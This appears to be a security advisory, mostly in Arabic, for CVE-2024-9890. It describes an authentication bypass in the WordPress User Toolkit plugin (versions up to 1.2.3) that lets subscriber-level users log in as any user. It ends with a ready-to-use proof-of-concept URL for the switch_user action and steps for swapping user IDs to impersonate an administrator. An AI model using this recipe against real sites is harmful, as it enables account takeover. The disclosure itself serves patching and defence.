
User Toolkit <= 1.2.3 - تجاوز المصادقة للمصادق عليهم (Subscriber+)
User Toolkit <= 1.2.3 - تجاوز المصادقة للمستخدمين المصادق عليهم (مشترك فأعلى)
المكوّن الإضافي User Toolkit لـ WordPress عرضة لتجاوز المصادقة في الإصدارات حتى 1.2.3 ضمناً. ويعود السبب إلى فحص صلاحيات غير صحيح في دالة 'switchUser'. وهذا يتيح للمهاجمين المصادق عليهم، الحاصلين على صلاحيات مستوى المشترك أو أعلى، تسجيل الدخول كأي مستخدم موجود على الموقع، مثل مدير النظام.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
سجّل الدخول بحسابك. اعرض مصدر صفحة ملفك الشخصي لالتقاط قيمة nonce. غيّر قيمة user_from إلى معرف المستخدم الخاص بك. غيّر user_id إلى معرف المدير. تم!